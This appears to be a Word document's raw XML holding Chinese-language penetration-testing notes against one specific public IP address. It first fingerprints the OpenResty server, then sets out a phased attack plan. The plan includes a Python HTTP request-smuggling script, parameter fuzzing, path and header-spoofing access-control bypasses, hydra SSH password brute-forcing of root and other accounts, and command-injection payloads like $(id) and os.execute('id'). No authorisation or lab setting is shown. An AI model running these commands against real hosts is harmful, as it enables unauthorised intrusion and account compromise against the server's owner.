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CA34" w14:textId="5A77D33B" w:rsidR="004935FF" w:rsidRDefault="00576FEA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>知道ip和有一个静态网站前提下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EF54FA" w14:textId="4196EE10" w:rsidR="00576FEA" w:rsidRDefault="00576FEA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00576FEA">
        <w:t>whatweb http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00576FEA">
        <w:t xml:space="preserve"> -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDAABA2" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B4C2A" w14:textId="45953583" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t>WhatWeb report for http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7075D8D9" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t>Status    : 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740CE4C1" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t>Title     : 404 Not Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0BDEB" w14:textId="0832AF9F" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">IP        : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072B94F" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t>Country   : UNITED STATES, US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3BFCD6" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA"/>
    <w:p w14:paraId="245FA8BC" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t>Summary   : HTTPServer[openresty]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D90C0B" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA"/>
    <w:p w14:paraId="15AFAA03" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t>Detected Plugins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19E86B" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t>[ HTTPServer ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF6149B" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        HTTP server header string. This plugin also attempts to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E815FF1" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        identify the operating system from the server header. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A6E1A" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA"/>
    <w:p w14:paraId="466EB536" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        String       : openresty (from server string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202AA353" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA"/>
    <w:p w14:paraId="1EC85E4D" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t>HTTP Headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D67DD4" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA5D6ED" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        Server: openresty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573322AE" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        Date: Sun, 12 Jul 2026 12:16:42 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC64C38" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        Content-Type: text/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5566E678" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        Content-Length: 130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A47989" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        Last-Modified: Tue, 07 Jul 2026 06:47:41 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD764D9" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014497C7" w14:textId="77777777" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        ETag: "6a4ca10d-82"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5637C190" w14:textId="5B2A7DD6" w:rsidR="00576FEA" w:rsidRDefault="00576FEA" w:rsidP="00576FEA">
      <w:r>
        <w:t xml:space="preserve">        Accept-Ranges: bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AFF0DF" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:t>Web 服务器是 openresty（核心指纹）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B85E39" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:t>价值：OpenResty 本质是 Nginx + Lua 脚本。这意味着除了常规 Nginx 漏洞（如解析漏洞、路径穿越），还需重点排查 Lua 代码注入、API 网关鉴权绕过 或 /lua 路由暴露的问题。未来看到 Server: openresty，攻击面要优先往“动态脚本执行”方向倾斜。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630387EC" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:t>状态码 200 与 Title“404 Not Found”的矛盾（软 404）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982530F" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:t>价值：服务端将不存在的页面强制返回了 200 状态码，而不是标准的 404。这通常是为了 SEO 友好或隐藏真实目录结构。未来注意：自动化扫描器依赖状态码判断存在性会彻底失效（全返回 200），你必须依赖 Content-Length（当前为 130） 和 Title 来区分真实页面和报错页面——如果某个路径返回的长度不是 130，大概率就是真实存在的资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B936A0" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:t>静态文件特征（ETag 与 Last-Modified）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5771593D" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:t>价值：存在 ETag: "6a4ca10d-82" 和 Last-Modified，说明该 404 页面是磁盘上的静态 HTML 文件（-82 十六进制等于十进制的 130，正好对应 Content-Length）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32794D15" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:t>未来注意：静态文件意味着不存在动态 WAF 干扰，且 ETag 格式是 Nginx 默认的 文件修改时间-文件大小。你可以通过对比不同路径返回的 ETag 来推断文件修改时间，甚至在某些配置下利用 ETag 进行缓存投毒或条件请求绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728EE2E3" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:t>IP 归属地（美国）与实际段位的差异</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA30A82" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:lastRenderedPageBreak/>
        <w:t>价值：报告显示 UNITED STATES，但 8.137.x.x 在 APNIC（亚太）注册中实际常用于国内云厂商（如阿里云/电信云）的海外节点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD71ABA" w14:textId="00972F0B" w:rsidR="001062DF" w:rsidRDefault="001062DF" w:rsidP="009103E1">
      <w:r w:rsidRPr="009103E1">
        <w:t>未来注意：不要轻信 WhatWeb 的地理位置，它基于本地 GeoIP 库，往往滞后。实际攻击中，这个 IP 大概率是国内厂商的海外堡垒机或CDN 回源节点，意味着真实后端可能在国内，请求可能经过云厂商的内网转发，排查时需留意 X-Forwarded-For 等头部</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F4790F" w14:textId="37D519E7" w:rsidR="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1"/>
    <w:p w14:paraId="054F95FA" w14:textId="5939503D" w:rsidR="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1"/>
    <w:p w14:paraId="06C82BC0" w14:textId="7D430B9D" w:rsidR="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>irsearch扫描目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102177C8" w14:textId="77777777" w:rsidR="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E113EC5" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1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Phase 2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：漏洞探测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1B1A1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2.1 HTTP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请求走私（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CVE-2024-33452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）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442851D1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59D7A115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python3 &lt;&lt; 'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B7A85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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA81CA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0E5F1DF0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测试请求走私：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HEAD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请求体作为新请求解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720C44A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 = socket.socket()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB3551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s.settimeout(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D3849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s.connect(('8.137.88.117', 80))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12930BD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2E394524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第一段：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HEAD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请求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+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体里藏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GET /stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E455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s.sendall(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32576E4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b"HEAD / HTTP/1.1\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E78C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b"Host: 8.137.88.117\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD369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b"Content-Length: 56\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05847B8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b"Connection: keep-alive\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4683ABC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b"\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4460F06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b"GET /stop/ HTTP/1.1\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F40286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b"Host: 8.137.88.117\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11BDB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b"Connection: close\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA8436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b"\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2E1D5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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A291795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data = b""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A7BB6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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E89AA8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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6481F8F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    chunk = s.recv(4096)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6938348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    if not chunk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4500D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        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3EA028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    data += chunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73930D1F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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B625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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A9464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s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8F59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5AF1A03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看有没有两条响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CC82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responses = data.split(b"HTTP/1.1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B68BE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print(f"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收到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{len(responses)-1}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条响应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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D21142E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for i, r in enumerate(responses[1:], 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190FE03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print(f"\n---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响应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{i} ---")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A282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   print(b"HTTP/1.1" + r[:200])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338234A9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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252AF37D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>如果输出两条响应</w:t>
      </w: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>走私漏洞存在，版本未修复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCBCFCF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2.2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参数模糊测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F02A64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1C97114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对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/stop/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和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/default/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做参数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fuzz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E8730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ffuf -w /usr/share/wordlists/parameters.txt -u "http://8.137.88.117/stop/?FUZZ=1" -fc 404,403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131537B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ffuf -w /usr/share/wordlists/parameters.txt -u "http://8.137.88.117/default/?FUZZ=1" -fc 404,403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300679C9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037AF0D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# POST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参数模糊</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E76DD6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ffuf -w /usr/share/wordlists/parameters.txt -X POST -d "FUZZ=1" -u "http://8.137.88.117/stop/" -fc 404,403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119463C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2.3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访问控制绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A84902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4005AA1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路径绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A2DEF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"http://8.137.88.117/stop/..;/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A108E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"http://8.137.88.117/stop/*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DF9960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"http://8.137.88.117/..%2fstop/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0BE3B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"http://8.137.88.117/stop%00/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B231F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"http://8.137.88.117/Stop/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEF0EB1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--path-as-is "http://8.137.88.117/STOP/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D135925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2A4FA6C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请求头伪造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBECF74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lastRenderedPageBreak/>
        <w:t>curl -s -H "X-Forwarded-For: 127.0.0.1" http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F296BD5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"X-Real-IP: 127.0.0.1" http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031AAA4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"X-Originating-IP: 127.0.0.1" http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31039F8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"X-Remote-IP: 127.0.0.1" http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730C55F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"Client-IP: 127.0.0.1" http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4BA81F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"X-Original-URL: /stop/" http://8.137.88.117/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607D859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"X-Rewrite-URL: /stop/" http://8.137.88.117/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B44B4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76078C79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# HTTP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方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4EB0E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-X PUT http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA3D8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-X PATCH http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677E5F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-X DELETE http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD56B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-X OPTIONS http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB3C61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-X TRACE http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2B7D2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2.4 HTTP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方法变换绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212C2DC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54CA6E60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# POST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里藏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GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F94DD6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"X-Http-Method-Override: GET" -X POST http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2BF95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"X-HTTP-Method: GET" -X POST http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010935F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-s -H "X-Method-Override: GET" -X POST http://8.137.88.117/stop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59689A93" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1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pict w14:anchorId="270BD898">
          <v:rect id="_x0000_i1025" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFEE2AE" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1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Phase 3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：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 xml:space="preserve">SSH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攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794AF404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4B80303E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3.1 OpenSSH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版本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 = 9.6p1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，查已知漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC79EDB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searchsploit openssh 9.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825F359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62F59B96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3.2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弱口令爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035EA5E2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hydra -l root -P /usr/share/wordlists/rockyou.txt -t 4 -e nsr ssh://8.137.88.117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610E812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047D9BE6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lastRenderedPageBreak/>
        <w:t xml:space="preserve"># 3.3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如果知道用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D27B2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hydra -l ubuntu -P /usr/share/wordlists/rockyou.txt -t 4 ssh://8.137.88.117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CB74A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hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 ssh://8.137.88.117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32467984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hydra -l www-data -P /usr/share/wordlists/rockyou.txt -t 4 ssh://8.137.88.117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B090CC" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1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pict w14:anchorId="0C8101AF">
          <v:rect id="_x0000_i1026" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AFC5C4" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1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Phase 4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：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 xml:space="preserve">HTTPS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端口探测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642BA02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38E6B558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# 443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端口可能在跑不同的服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7C9EA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openssl s_client -connect 8.137.88.117:443 -servername 8.137.88.117 2&gt;&amp;1 | openssl x509 -text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C99BA6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nmap -p 443 --script ssl-enum-ciphers 8.137.88.117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091A5B7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-k -v https://8.137.88.117/stop/ 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F2736" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1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pict w14:anchorId="4C2A4E78">
          <v:rect id="_x0000_i1027" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E01245" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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</w:pP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Phase 5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：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 xml:space="preserve">Lua </w:t>
      </w:r>
      <w:r w:rsidRPr="009103E1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特定攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732997C3" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1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>如果发现</w:t>
      </w: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Lua </w:t>
      </w:r>
      <w:r w:rsidRPr="009103E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>脚本暴露了参数端点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB0049C" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103E1">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009103E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD9663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值注入测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126F12E8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"http://8.137.88.117/stop/?opt=';id;'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3517EF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"http://8.137.88.117/stop/?opt=$(id)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E41AD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"http://8.137.88.117/stop/?opt=`id`"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E797D4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"http://8.137.88.117/stop/?opt='%20|%20id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB8907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curl "http://8.137.88.117/stop/?opt=-e%20os.execute('id')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8BB12C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</w:p>
    <w:p w14:paraId="1618D3CE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 xml:space="preserve"># </w:t>
      </w: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带时间盲打</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51825230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time curl -s "http://8.137.88.117/stop/?opt=sleep(5)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97D8CD" w14:textId="77777777" w:rsidR="009103E1" w:rsidRPr="009103E1" w:rsidRDefault="009103E1" w:rsidP="009103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/>
          <w:color w:val="111827"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009103E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="111827"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>time curl -s "http://8.137.88.117/stop/?opt='|sleep%205|'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A7494" w14:textId="77777777" w:rsidR="001062DF" w:rsidRPr="009103E1" w:rsidRDefault="001062DF" w:rsidP="00576FEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001062DF" w:rsidRPr="00910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D3652"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F06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DF"/>
    <w:rsid w:val="001062DF"/>
    <w:rsid w:val="004935FF"/>
    <w:rsid w:val="00576FEA"/>
    <w:rsid w:val="0075253C"/>
    <w:rsid w:val="009103E1"/>
    <w:rsid w:val="00AF35F6"/>
    <w:rsid w:val="00C6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77FFB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A9764BA6-2EE9-4C17-AA91-30DD627D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103E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062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062DF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001062DF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103E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whitespace-pre-wrap">
    <w:name w:val="whitespace-pre-wrap"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009103E1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph-node">
    <w:name w:val="paragraph-node"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="009103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03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103E1"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91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5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5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8054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2352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165807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9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5868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14178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430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8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5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5631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11936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20927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7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14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455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8627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3621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1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5110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2015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205750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25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4974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10721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12883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86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07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6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8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681">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="360"/>
                  <w:marBottom w:val="360"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="DEDEDE"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="DEDEDE"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="DEDEDE"/>
